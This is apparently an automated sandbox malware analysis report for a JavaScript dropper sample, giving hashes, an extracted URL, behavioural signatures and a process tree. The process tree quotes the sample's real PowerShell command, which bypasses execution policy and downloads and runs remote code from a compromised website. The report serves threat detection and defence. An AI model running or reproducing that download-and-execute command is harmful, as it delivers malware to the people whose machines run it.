Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-11-2024 13:20
Static task
static1
Behavioral task
behavioral1
Sample
28f00102733ebd8d49df607dc67b5e4a569137d9bc46a5908ec9f5930aaa8804.js
Resource
win7-20240903-en
General
-
Target
28f00102733ebd8d49df607dc67b5e4a569137d9bc46a5908ec9f5930aaa8804.js
-
Size
37KB
-
MD5
e92cc1e935c40fea032292de0c6504e7
-
SHA1
a3a36073c53845f94faded04e4c9cf54873a87b2
-
SHA256
28f00102733ebd8d49df607dc67b5e4a569137d9bc46a5908ec9f5930aaa8804
-
SHA512
aa826cf61930bd095c678d9af0401d2429f61e2bf7d47fb6700e96db496791a5659dd81e1686293915a51f6dc94d59cfe02ca10fc7ba0350d56222fddb564845
-
SSDEEP
384:8ZZ9ZZ9ZZ9ZZRZZ9ZZ9ZZ9ZZlbPZZ9ZZcZZ9ZZ9ZZ9ZZXZZ9ZZ9ZZ9ZZl/ZZ9ZZm:Ywqfm7jk
Malware Config
Extracted
http://paradisoprovisor1.hospedagemdesites.ws/wp-admin/images/about-heade-about.svg
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2192 powershell.exe -
pid Process 2192 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2480 wrote to memory of 2192 2480 wscript.exe 31 PID 2480 wrote to memory of 2192 2480 wscript.exe 31 PID 2480 wrote to memory of 2192 2480 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28f00102733ebd8d49df607dc67b5e4a569137d9bc46a5908ec9f5930aaa8804.js1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Bypass i'e'x ((New-Object System.Net.WebClient).DownloadString('http://paradisoprovisor1.hospedagemdesites.ws/wp-admin/images/about-heade-about.svg'))2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-